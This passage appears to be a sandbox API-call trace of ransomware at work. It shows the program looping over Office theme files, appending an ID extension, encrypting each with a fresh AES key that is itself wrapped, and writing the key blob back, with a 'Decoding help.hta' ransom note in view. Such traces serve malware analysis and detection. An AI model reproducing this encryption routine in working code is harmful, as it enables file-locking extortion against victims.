1 [0042.850] CloseHandle (hObject=0x6a8) returned 1 [0042.852] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Adjacency.thmx.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0042.852] FindNextFileW (in: hFindFile=0x5d8bd0, lpFindFileData=0x544fd30 | out: lpFindFileData=0x544fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x62f9d200, ftCreationTime.dwHighDateTime=0x1cbded9, ftLastAccessTime.dwLowDateTime=0xe5943160, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x62f9d200, ftLastWriteTime.dwHighDateTime=0x1cbded9, nFileSizeHigh=0x0, nFileSizeLow=0x11098, dwReserved0=0x0, dwReserved1=0x0, cFileName="Angles.thmx", cAlternateFileName="ANGLES~1.THM")) returned 1 [0042.852] lstrcpyW (in: lpString1=0x10e5efc8, lpString2="\\\\?\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\*.*") returned="\\\\?\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\*.*" [0042.852] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\*.*") returned 60 [0042.852] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Decoding help.hta" [0042.852] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Decoding help.hta" (normalized: "c:\\program files\\microsoft office\\document themes 14\\decoding help.hta")) returned 0x1 [0042.852] lstrcmpiW (lpString1="Decoding help.hta", lpString2="Angles.thmx") returned 1 [0042.852] lstrlenW (lpString="Angles.thmx") returned 11 [0042.852] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\*.*") returned="\\\\?\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\*.*" [0042.852] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\*.*") returned 60 [0042.852] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\", lpString2="Angles.thmx" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Angles.thmx") returned="\\\\?\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Angles.thmx" [0042.852] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Angles.thmx" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Angles.thmx") returned="\\\\?\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Angles.thmx" [0042.853] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Angles.thmx", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Angles.thmx.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Angles.thmx.[ID]g9uZrLhJaygpwRm1[ID]" [0042.853] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Angles.thmx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\angles.thmx"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Angles.thmx.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\microsoft office\\document themes 14\\angles.thmx.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0042.877] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Angles.thmx.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\microsoft office\\document themes 14\\angles.thmx.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x700 [0042.877] CreateFileMappingA (hFile=0x700, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x69c [0042.877] CryptAcquireContextA (in: phProv=0x544fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x544fcec*=0x3448be8) returned 1 [0042.878] CryptGenKey (in: hProv=0x3448be8, Algid=0x6610, dwFlags=0x1, phKey=0x544fce8 | out: phKey=0x544fce8*=0x6718b0) returned 1 [0042.878] CryptExportKey (in: hKey=0x6718b0, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x544fbe4, pdwDataLen=0x544fce4 | out: pbData=0x544fbe4*, pdwDataLen=0x544fce4*=0x2c) returned 1 [0042.878] MapViewOfFile (hFileMappingObject=0x69c, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x11080) returned 0x8cb0000 [0042.905] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x544fbe4*, pdwDataLen=0x544fcf8*=0x40, dwBufLen=0x100 | out: pbData=0x544fbe4*, pdwDataLen=0x544fcf8*=0x100) returned 1 [0042.905] CryptEncrypt (in: hKey=0x6718b0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x8cb0000, pdwDataLen=0x544fce4*=0x11080, dwBufLen=0x11080 | out: pbData=0x8cb0000*, pdwDataLen=0x544fce4*=0x11080) returned 1 [0042.934] UnmapViewOfFile (lpBaseAddress=0x8cb0000) returned 1 [0042.936] CloseHandle (hObject=0x69c) returned 1 [0042.936] CryptDestroyKey (hKey=0x6718b0) returned 1 [0042.936] CryptReleaseContext (hProv=0x3448be8, dwFlags=0x0) returned 1 [0042.936] SetFilePointerEx (in: hFile=0x700, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0042.936] WriteFile (in: hFile=0x700, lpBuffer=0x544fbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x544fcf8, lpOverlapped=0x0 | out: lpBuffer=0x544fbe4*, lpNumberOfBytesWritten=0x544fcf8*=0x100, lpOverlapped=0x0) returned 1 [0042.937] WriteFile (in: hFile=0x700, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0x544fcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0x544fcf8*=0x500, lpOverlapped=0x0) returned 1 [0042.938] CloseHandle (hObject=0x700) returned 1 [0042.939] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Angles.thmx.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0042.939] FindNextFileW (in: hFindFile=0x5d8bd0, lpFindFileData=0x544fd30 | out: lpFindFileData=0x544fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfda5e100, ftCreationTime.dwHighDateTime=0x1cbded8, ftLastAccessTime.dwLowDateTime=0xe59692c0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xfda5e100, ftLastWriteTime.dwHighDateTime=0x1cbded8, nFileSizeHigh=0x0, nFileSizeLow=0x3f427, dwReserved0=0x0, dwReserved1=0x0, cFileName="Apex.thmx", cAlternateFileName="APEX~1.THM")) returned 1 [0042.939] lstrcpyW (in: lpString1=0x668fd0, lpString2="\\\\?\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\*.*") returned="\\\\?\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\*.*" [0042.939] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\*.*") returned 60 [0042.939] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Decoding help.hta" [0042.940] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Decoding help.hta" (normalized: "c:\\program files\\microsoft office\\document themes 14\\decoding help.hta")) returned 0x1 [0042.940] lstrcmpiW (lpString1="Decoding help.hta", lpString2="Apex.thmx") returned 1 [0042.940] lstrlenW (lpString="Apex.thmx") returned 9 [0042.940] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\*.*") returned="\\\\?\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\*.*" [0042.940] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\*.*") returned 60 [0042.940] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\", lpString2="Apex.thmx" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Apex.thmx") returned="\\\\?\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Apex.thmx" [0042.940] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Apex.thmx" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Apex.thmx") returned="\\\\?\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Apex.thmx" [0042.940] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Apex.thmx", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Apex.thmx.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Apex.thmx.[ID]g9uZrLhJaygpwRm1[ID]" [0042.940] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Apex.thmx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\apex.thmx"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Apex.thmx.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\microsoft office\\document themes 14\\apex.thmx.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0042.964] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Apex.thmx.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\microsoft office\\document themes 14\\apex.thmx.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x70c [0042.964] CreateFileMappingA (hFile=0x70c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x710 [0042.964] CryptAcquireContextA (in: phProv=0x544fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x544fcec*=0x3448cf8) returned 1 [0042.965] CryptGenKey (in: hProv=0x3448cf8, Algid=0x6610, dwFlags=0x1, phKey=0x544fce8 | out: phKey=0x544fce8*=0x671af0) returned 1 [0042.965] CryptExportKey (in: hKey=0x671af0, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x544fbe4, pdwDataLen=0x544fce4 | out: pbData=0x544fbe4*, pdwDataLen=0x544fce4*=0x2c) returned 1 [0042.965] MapViewOfFile (hFileMappingObject=0x710, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x3f420) returned 0xddb0000 [0042.975] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x544fbe4*, pdwDataLen=0x544fcf8*=0x40, dwBufLen=0x100 | out: pbData=0x544fbe4*, pdwDataLen=0x544fcf8*=0x100) returned 1 [0042.976] CryptEncrypt (in: hKey=0x671af0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0xddb0000, pdwDataLen=0x544fce4*=0x3f420, dwBufLen=0x3f420 | out: pbData=0xddb0000*, pdwDataLen=0x544fce4*=0x3f420) returned 1 [0044.365] UnmapViewOfFile (lpBaseAddress=0xddb0000) returned 1 [0044.369] CloseHandle (hObject=0x710) returned 1 [0044.369] CryptDestroyKey (hKey=0x671af0) returned 1 [0044.369] CryptReleaseContext (hProv=0x3448cf8, dwFlags=0x0) returned 1 [0044.369] SetFilePointerEx (in: hFile=0x70c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0044.369] WriteFile (in: hFile=0x70c, lpBuffer=0x544fbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x544fcf8, lpOverlapped=0x0 | out: lpBuffer=0x544fbe4*, lpNumberOfBytesWritten=0x544fcf8*=0x100, lpOverlapped=0x0) returned 1 [0044.370] WriteFile (in: hFile=0x70c, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0x544fcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0x544fcf8*=0x500, lpOverlapped=0x0) returned 1 [0044.370] CloseHandle (hObject=0x70c) returned 1 [0044.374] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Apex.thmx.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0044.374] FindNextFileW (in: hFindFile=0x5d8bd0, lpFindFileData=0x544fd30 | out: lpFindFileData=0x544fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3cd43200, ftCreationTime.dwHighDateTime=0x1cbded9, ftLastAccessTime.dwLowDateTime=0xe59692c0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x3cd43200, ftLastWriteTime.dwHighDateTime=0x1cbded9, nFileSizeHigh=0x0, nFileSizeLow=0x15a56, dwReserved0=0x0, dwReserved1=0x0, cFileName="Apothecary.thmx", cAlternateFileName="APOTHE~1.THM")) returned 1 [0044.374] lstrcpyW (in: lpString1=0x5fbd100, lpString2="\\\\?\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\*.*") returned="\\\\?\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\*.*" [0044.374] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\*.*") returned 60 [0044.374] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Decoding help.hta" [0044.374] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Decoding help.hta" (normalized: "c:\\program files\\microsoft office\\document themes 14\\decoding help.hta")) returned 0x1 [0044.374] lstrcmpiW (lpString1="Decoding help.hta", lpString2="Apothecary.thmx") returned 1 [0044.374] lstrlenW (lpString="Apothecary.thmx") returned 15 [0044.374] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\*.*") returned="\\\\?\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\*.*" [0044.374] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\*.*") returned 60 [0044.374] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\", lpString2="Apothecary.thmx" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Apothecary.thmx") returned="\\\\?\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Apothecary.thmx" [0044.374] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Apothecary.thmx" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Apothecary.thmx") returned="\\\\?\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Apothecary.thmx" [0044.374] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Apothecary.thmx", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Apothecary.thmx.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Apothecary.thmx.[ID]g9uZrLhJaygpwRm1[ID]" [0044.375] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Apothecary.thmx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\apothecary.thmx"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Apothecary.thmx.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\microsoft office\\document themes 14\\apothecary.thmx.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0044.413] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Apothecary.thmx.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\microsoft office\\document themes 14\\apothecary.thmx.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x414 [0044.413] CreateFileMappingA (hFile=0x414, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x724 [0044.414] CryptAcquireContextA (in: phProv=0x544fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x544fcec*=0x3448c70) returned 1 [0044.414] CryptGenKey (in: hProv=0x3448c70, Algid=0x6610, dwFlags=0x1, phKey=0x544fce8 | out: phKey=0x544fce8*=0x5da678) returned 1 [0044.414] CryptExportKey (in: hKey=0x5da678, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x544fbe4, pdwDataLen=0x544fce4 | out: pbData=0x544fbe4*, pdwDataLen=0x544fce4*=0x2c) returned 1 [0044.414] MapViewOfFile (hFileMappingObject=0x724, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x15a40) returned 0x40b0000 [0044.440] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x544fbe4*, pdwDataLen=0x544fcf8*=0x40, dwBufLen=0x100 | out: pbData=0x544fbe4*, pdwDataLen=0x544fcf8*=0x100) returned 1 [0044.441] CryptEncrypt (in: hKey=0x5da678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x40b0000, pdwDataLen=0x544fce4*=0x15a40, dwBufLen=0x15a40 | out: pbData=0x40b0000*, pdwDataLen=0x544fce4*=0x15a40) returned 1 [0044.555] UnmapViewOfFile (lpBaseAddress=0x40b0000) returned 1 [0044.558] CloseHandle (hObject=0x724) returned 1 [0044.558] CryptDestroyKey (hKey=0x5da678) returned 1 [0044.558] CryptReleaseContext (hProv=0x3448c70, dwFlags=0x0) returned 1 [0044.558] SetFilePointerEx (in: hFile=0x414, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0044.558] WriteFile (in: hFile=0x414, lpBuffer=0x544fbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x544fcf8, lpOverlapped=0x0 | out: lpBuffer=0x544fbe4*, lpNumberOfBytesWritten=0x544fcf8*=0x100, lpOverlapped=0x0) returned 1 [0044.559] WriteFile (in: hFile=0x414, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0x544fcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0x544fcf8*=0x500, lpOverlapped=0x0) returned 1 [0044.559] CloseHandle (hObject=0x414) returned 1 [0044.560] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Apothecary.thmx.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0044.561] FindNextFileW (in: hFindFile=0x5d8bd0, lpFindFileData=0x544fd30 | out: lpFindFileData=0x544fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1396800, ftCreationTime.dwHighDateTime=0x1cbded9, ftLastAccessTime.dwLowDateTime=0xe59692c0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x1396800, ftLastWriteTime.dwHighDateTime=0x1cbded9, nFileSizeHigh=0x0, nFileSizeLow=0x109e5, dwReserved0=0x0, dwReserved1=0x0, cFileName="Aspect.thmx", cAlternateFileName="ASPECT~1.THM")) returned 1 [0044.561] lstrcpyW (in: lpString1=0x110a78d0, lpString2="\\\\?\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\*.*") returned="\\\\?\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\*.*" [0044.561] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\*.*") returned 60 [0044.561] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Decoding help.hta" [0044.561] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Decoding help.hta" (normalized: "c:\\program files\\microsoft office\\document themes 14\\decoding help.hta")) returned 0x1 [0044.561] lstrcmpiW (lpString1="Decoding help.hta", lpString2="Aspect.thmx") returned 1 [0044.561] lstrlenW (lpString="Aspect.thmx") returned 11 [0044.561] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\*.*") returned="\\\\?\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\*.*" [0044.561] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\*.*") returned 60 [0044.561] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\", lpString2="Aspect.thmx" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Aspect.thmx") returned="\\\\?\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Aspect.thmx" [0044.561] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Aspect.thmx" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Aspect.thmx") returned="\\\\?\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Aspect.thmx" [0044.561] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Aspect.thmx", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Aspect.thmx.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Aspect.thmx.[ID]g9uZrLhJaygpwRm1[ID]" [0044.561] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Aspect.thmx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\aspect.thmx"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Aspect.thmx.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\microsoft office\\document themes 14\\aspect.thmx.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0044.687] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Aspect.thmx.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\microsoft office\\document themes 14\\aspect.thmx.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c8 [0044.687] CreateFileMappingA (hFile=0x3c8, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x260 [0044.687] CryptAcquireContextA (in: phProv=0x544fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x544fcec*=0x3448e08) returned 1 [0044.688] CryptGenKey (in: hProv=0x3448e08, Algid=0x6610, dwFlags=0x1, phKey=0x544fce8 | out: phKey=0x544fce8*=0x5da878) returned 1 [0044.688] CryptExportKey (in: hKey=0x5da878, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x544fbe4, pdwDataLen=0x544fce4 | out: pbData=0x544fbe4*, pdwDataLen=0x544fce4*=0x2c) returned 1 [0044.688] MapViewOfFile (hFileMappingObject=0x260, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x109e0) returned 0x40b0000 [0045.662] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x544fbe4*, pdwDataLen=0x544fcf8*=0x40, dwBufLen=0x100 | out: pbData=0x544fbe4*, pdwDataLen=0x544fcf8*=0x100) returned 1 [0048.862] CryptEncrypt (in: hKey=0x5da878, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x40b0000, pdwDataLen=0x544fce4*=0x109e0, dwBufLen=0x109e0 | out: pbData=0x40b0000*, pdwDataLen=0x544fce4*=0x109e0) returned 1 [0048.873] UnmapViewOfFile (lpBaseAddress=0x40b0000) returned 1 [0048.876] CloseHandle (hObject=0x260) returned 1 [0048.876] CryptDestroyKey (hKey=0x5da878) returned 1 [0048.876] CryptReleaseContext (hProv=0x3448e08, dwFlags=0x0) returned 1 [0048.876] SetFilePointerEx (in: hFile=0x3c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0048.876] WriteFile (in: hFile=0x3c8, lpBuffer=0x544fbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x544fcf8, lpOverlapped=0x0 | out: lpBuffer=0x544fbe4*, lpNumberOfBytesWritten=0x544fcf8*=0x100, lpOverlapped=0x0) returned 1 [0050.926] WriteFile (in: hFile=0x3c8, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0x544fcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0x544fcf8*=0x500, lpOverlapped=0x0) returned 1 [0050.926] CloseHandle (hObject=0x3c8) returned 1 [0051.646] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Aspect.thmx.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0055.289] FindNextFileW (in: hFindFile=0x5d8bd0, lpFindFileData=0x544fd30 | out: lpFindFileData=0x544fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4067b900, ftCreationTime.dwHighDateTime=0x1cbded9, ftLastAccessTime.dwLowDateTime=0xe598f420, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x4067b900, ftLastWriteTime.dwHighDateTime=0x1cbded9, nFileSizeHigh=0x0, nFileSizeLow=0x1763b, dwReserved0=0x0, dwReserved1=0x0, cFileName="Austin.thmx", cAlternateFileName="AUSTIN~1.THM")) returned 1 [0055.289] lstrcpyW (in: 